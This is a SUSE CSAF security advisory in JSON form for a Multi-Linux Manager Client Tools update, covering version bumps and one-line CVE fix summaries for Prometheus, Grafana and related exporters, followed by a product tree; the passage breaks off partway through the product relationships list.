8.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update 5.0.7 for Multi-Linux Manager Client Tools",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update fixes the following issues:\n\ndracut-saltboot:\n\n- Version update to 1.1.0:\n\n * Retry DHCP requests up to 3 times (bsc#1253004)\n\ngolang-github-QubitProducts-exporter_exporter:\n\n- Non-customer-facing optimization and update\n\ngolang-github-boynux-squid_exporter:\n\n- Version update from 1.6.0 to 1.13.0 with the following highlighted changes and fixes (jsc#PED-14971):\n\n * Added compatibility for Squid 6 and support for the squid-internal-mgr metrics path\n * Added TLS and Basic Authentication to the exporter\u2019s web interface\n * Added support for the exporter to authenticate against the Squid proxy itself\n * Allow the gathering of process information without requiring root privileges\n * The exporter can now be configured using environment variables\n * Added support for custom labels to all exported metrics for better data filtering\n * New metrics to track if Squid is running (squid_up), how long a scrape takes, and if any errors occurred\n * Added \u0027service time\u0027 metrics to analyze proxy speed and performance.\n * Added a metric for open file descriptors (process_open_fds) to help prevent connection bottlenecks\n * Corrected the squid_client_http_requests_total metric to ensure accurate reporting\n\n\ngolang-github-lusitaniae-apache_exporter:\n\n- Version update from 1.0.8 to 1.0.10:\n\n * Updated github.com/prometheus/client_golang to 1.21.1\n * Updated github.com/prometheus/common to 0.63.0\n * Updated github.com/prometheus/exporter-toolkit to 0.14.0\n * Fixed signal handler logging\n\ngolang-github-prometheus-prometheus:\n\n- Security issues fixed:\n\n * CVE-2026-27606: Fixed arbitrary file write via path traversal in rollup (bsc#1258893)\n * CVE-2026-25547: Fixed unbounded brace range expansion leading to excessive CPU and memory consumption (bsc#1257841)\n * CVE-2026-1615, CVE-2025-61140 The old web UI is no longer built due to security issues (bsc#1257897, bsc#1257442)\n * CVE-2025-13465: Bump lodash package to version 4.17.23 to fix prototype pollution vulnerability (bsc#1257329)\n * CVE-2025-12816: Interpretation conflict vulnerability allowing bypassing cryptographic verifications (bsc#1255588)\n\n- Version update from 2.53.4 to 3.5.0 with the following highlighted changes (jsc#PED-13824):\n\n * Modernized Interface: Introduced a brand-new UI\n * Enhanced Cloud and Auth: Added unified AWS service discovery (EC2, ECS, Lightsail) and Azure Workload Identity support\n for more secure, native cloudauthentication.\n * Performance Standards: Fully integrated OpenTelemetry (OTLP) ingestion and moved Native Histograms from experimental\n to a stable feature.\n * Advanced Data Export: Rolled out Remote Write 2.0, offering better performance and metadata handling when sending\n data to external systems.\n * Query Power: Added new PromQL functions (like first_over_time and last_over_time) and optimization for grouping\n operations\n * Better Visibility: The UI now displays detailed relabeling steps, scrape intervals, and timeouts, making it easier\n to troubleshoot why targets aren\u0027t reporting correctly.\n * Critical Fixes: Resolved significant memory leaks related to query logging and fixed bugs where targets were\n accidentally being scraped multiple times\n\ngrafana:\n\n- Security issues fixed:\n\n * CVE-2026-21722: Public dashboards annotations: use dashboard timerange if time selection disabled (bsc#1258136)\n * CVE-2026-21721: Fixed access control by the dashboard permissions API (bsc#1257337)\n * CVE-2026-21720: Fixed unauthenticated DoS (bsc#1257349)\n * CVE-2025-68156: Fixed potential DoS via unbounded recursion in builtin functions (bsc#1255340)\n * CVE-2025-3415: Fixedexposure of DingDing alerting integration URL to Viewer level users (bsc#1245302)\n\n- Version update from 11.5.10 to 11.6.11 with the following highlighted changes and fixes:\n \n * Performance Boost: Introduced WebGL-powered geomaps for smoother map visualizations and\n removed blurred backgrounds from UI overlays to speed up the interface\n * One-Click Actions: Visualizations now support faster navigation via one-click links and actions\n * Alerting History: Added version history for alert rules, allowing you to track changes over time\n * Service Accounts: Automated the migration of old API keys to more secure Service Accounts upon startup\n * Cron Support: Annotations now support Cron syntax for more flexible scheduling\n * Identity and Auth: Hardened the Avatar feature (now requires sign-in) and fixed several login redirection issues\n when Grafana is hosted on a subpath\n * Data Source Support: Added support for Cloud Partner Prometheus data sources and improved Azure legend formatting\n * Alerting Limits: Added size limits for expanded notification templates to prevent system strain\n * RBAC: Integrated Role-Based Access Control (RBAC) into the Alertmanager via the reqAction field\n * Data Consistency: Fixed several issues with Graphite and InfluxDB regarding how variables are handled in repeated\n rows or nested queries\n * Dashboard Reliability: Resolved bugs involving row repeats and \u0027self-referencing\u0027 data links\n * Alerting Fixes: Patched a critical \u0027panic\u0027 (crash) caused by a race condition in alert rules and fixed issues where\n contact points weren\u0027t working correctly\n * URL Handling: Fixed a bug where \u0027true\u0027 values in URL parameters weren\u0027t being read correctly\n\nprometheus-blackbox_exporter:\n\n- Non-customer-facing optimization and update\n\nspacecmd:\n\n- Version update to 5.0.15:\n\n * Fixed typo in spacecmd help ca-cert flag (bsc#1253174)\n * Convert cached IDs to integer values (bsc#1251995)\n * Fixed spacecmd binary file upload (bsc#1253659)\n\nuyuni-tools:\n\n- Version update to 0.1.38:\n\n * Fixed cobbler configuration when migrating to standalone files (bsc#1256803)\n * Detect custom apache and squid config in the /etc/uyuni/proxy folder\n * Add ssh tuning to configure sshd (bsc#1253738)\n * Ignore supportconfig errors (bsc#1255781)\n * Bumped the default image tag to 5.0.7\n * Removed cgroup mount for podman containers (bsc#1253347)\n * Registry flag can be a string (bsc#1254589)\n * Use static supportconfig name to avoid dynamic search (bsc#1257941)\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1013,SUSE-SLE-Manager-Tools-15-2026-1013,SUSE-SLE-Manager-Tools-For-Micro-5-2026-1013,SUSE-SLE-Module-Packagehub-Subpackages-15-SP7-2026-1013,openSUSE-SLE-15.6-2026-1013",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1013-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1013-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261013-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1013-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024917.html"
},
{
"category": "self",
"summary": "SUSE Bug 1245302",
"url": "https://bugzilla.suse.com/1245302"
},
{
"category": "self",
"summary": "SUSE Bug 1251995",
"url": "https://bugzilla.suse.com/1251995"
},
{
"category": "self",
"summary": "SUSE Bug 1253004",
"url": "https://bugzilla.suse.com/1253004"
},
{
"category": "self",
"summary": "SUSE Bug 1253174",
"url": "https://bugzilla.suse.com/1253174"
},
{
"category": "self",
"summary": "SUSE Bug 1253347",
"url": "https://bugzilla.suse.com/1253347"
},
{
"category": "self",
"summary": "SUSE Bug 1253659",
"url": "https://bugzilla.suse.com/1253659"
},
{
"category": "self",
"summary": "SUSE Bug 1253738",
"url": "https://bugzilla.suse.com/1253738"
},
{
"category": "self",
"summary": "SUSE Bug 1254589",
"url": "https://bugzilla.suse.com/1254589"
},
{
"category": "self",
"summary": "SUSE Bug 1255340",
"url": "https://bugzilla.suse.com/1255340"
},
{
"category": "self",
"summary": "SUSE Bug 1255588",
"url": "https://bugzilla.suse.com/1255588"
},
{
"category": "self",
"summary": "SUSE Bug 1255781",
"url": "https://bugzilla.suse.com/1255781"
},
{
"category": "self",
"summary": "SUSE Bug 1256803",
"url": "https://bugzilla.suse.com/1256803"
},
{
"category": "self",
"summary": "SUSE Bug 1257329",
"url": "https://bugzilla.suse.com/1257329"
},
{
"category": "self",
"summary": "SUSE Bug 1257337",
"url": "https://bugzilla.suse.com/1257337"
},
{
"category": "self",
"summary": "SUSE Bug 1257349",
"url": "https://bugzilla.suse.com/1257349"
},
{
"category": "self",
"summary": "SUSE Bug 1257442",
"url": "https://bugzilla.suse.com/1257442"
},
{
"category": "self",
"summary": "SUSE Bug 1257841",
"url": "https://bugzilla.suse.com/1257841"
},
{
"category": "self",
"summary": "SUSE Bug 1257897",
"url": "https://bugzilla.suse.com/1257897"
},
{
"category": "self",
"summary": "SUSE Bug 1257941",
"url": "https://bugzilla.suse.com/1257941"
},
{
"category": "self",
"summary": "SUSE Bug 1258136",
"url": "https://bugzilla.suse.com/1258136"
},
{
"category": "self",
"summary": "SUSE Bug 1258893",
"url": "https://bugzilla.suse.com/1258893"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-12816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-12816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-13465 page",
"url": "https://www.suse.com/security/cve/CVE-2025-13465/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-3415 page",
"url": "https://www.suse.com/security/cve/CVE-2025-3415/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-61140 page",
"url": "https://www.suse.com/security/cve/CVE-2025-61140/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-1615 page",
"url": "https://www.suse.com/security/cve/CVE-2026-1615/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-21720 page",
"url": "https://www.suse.com/security/cve/CVE-2026-21720/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-21721 page",
"url": "https://www.suse.com/security/cve/CVE-2026-21721/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-21722 page",
"url": "https://www.suse.com/security/cve/CVE-2026-21722/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-25547 page",
"url": "https://www.suse.com/security/cve/CVE-2026-25547/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-27606 page",
"url": "https://www.suse.com/security/cve/CVE-2026-27606/"
}
],
"title": "Security update 5.0.7 for Multi-Linux Manager Client Tools",
"tracking": {
"current_release_date": "2026-03-25T10:11:52Z",
"generator": {
"date": "2026-03-25T10:11:52Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1013-1",
"initial_release_date": "2026-03-25T10:11:52Z",
"revision_history": [
{
"date": "2026-03-25T10:11:52Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"product": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"product_id": "firewalld-prometheus-config-0.1-150000.3.67.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.aarch64",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.aarch64",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"product_id": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"product": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"product_id": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-150000.1.90.1.aarch64",
"product": {
"name": "grafana-11.6.11-150000.1.90.1.aarch64",
"product_id": "grafana-11.6.11-150000.1.90.1.aarch64"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.38-150000.1.30.1.aarch64",
"product": {
"name": "mgrctl-0.1.38-150000.1.30.1.aarch64",
"product_id": "mgrctl-0.1.38-150000.1.30.1.aarch64"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"product_id": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.i586",
"product": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.i586",
"product_id": "firewalld-prometheus-config-0.1-150000.3.67.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.i586",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.i586",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.i586",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.i586",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.i586",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.i586",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.i586",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.i586",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.i586",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.i586",
"product_id": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.i586"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.i586",
"product": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.i586",
"product_id": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.i586"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.38-150000.1.30.1.i586",
"product": {
"name": "mgrctl-0.1.38-150000.1.30.1.i586",
"product_id": "mgrctl-0.1.38-150000.1.30.1.i586"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.i586",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.i586",
"product_id": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"product": {
"name": "dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"product_id": "dracut-saltboot-1.1.0-150000.1.65.1.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"product": {
"name": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"product_id": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"product": {
"name": "mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"product_id": "mgrctl-lang-0.1.38-150000.1.30.1.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"product": {
"name": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"product_id": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch"
}
},
{
"category": "product_version",
"name": "spacecmd-5.0.15-150000.3.142.1.noarch",
"product": {
"name": "spacecmd-5.0.15-150000.3.142.1.noarch",
"product_id": "spacecmd-5.0.15-150000.3.142.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"product": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"product_id": "firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.ppc64le",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.ppc64le",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"product_id": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"product": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"product_id": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-150000.1.90.1.ppc64le",
"product": {
"name": "grafana-11.6.11-150000.1.90.1.ppc64le",
"product_id": "grafana-11.6.11-150000.1.90.1.ppc64le"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.38-150000.1.30.1.ppc64le",
"product": {
"name": "mgrctl-0.1.38-150000.1.30.1.ppc64le",
"product_id": "mgrctl-0.1.38-150000.1.30.1.ppc64le"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"product_id": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"product": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"product_id": "firewalld-prometheus-config-0.1-150000.3.67.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.s390x",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.s390x",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"product_id": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"product": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"product_id": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-150000.1.90.1.s390x",
"product": {
"name": "grafana-11.6.11-150000.1.90.1.s390x",
"product_id": "grafana-11.6.11-150000.1.90.1.s390x"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.38-150000.1.30.1.s390x",
"product": {
"name": "mgrctl-0.1.38-150000.1.30.1.s390x",
"product_id": "mgrctl-0.1.38-150000.1.30.1.s390x"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"product_id": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"product": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"product_id": "firewalld-prometheus-config-0.1-150000.3.67.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.x86_64",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.x86_64",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-150000.3.30.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"product_id": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"product": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"product_id": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-150000.1.90.1.x86_64",
"product": {
"name": "grafana-11.6.11-150000.1.90.1.x86_64",
"product_id": "grafana-11.6.11-150000.1.90.1.x86_64"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.38-150000.1.30.1.x86_64",
"product": {
"name": "mgrctl-0.1.38-150000.1.30.1.x86_64",
"product_id": "mgrctl-0.1.38-150000.1.30.1.x86_64"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"product_id": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Manager Client Tools 15",
"product": {
"name": "SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15"
}
},
{
"category": "product_name",
"name": "SUSE Manager Client Tools for SLE Micro 5",
"product": {
"name": "SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-manager-tools-micro:5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:packagehub:15:sp7"
}
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-saltboot-1.1.0-150000.1.65.1.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch"
},
"product_reference": "dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64"
},
"product_reference": "firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le"
},
"product_reference": "firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x"
},
"product_reference": "firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-150000.3.67.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64"
},
"product_reference": "firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
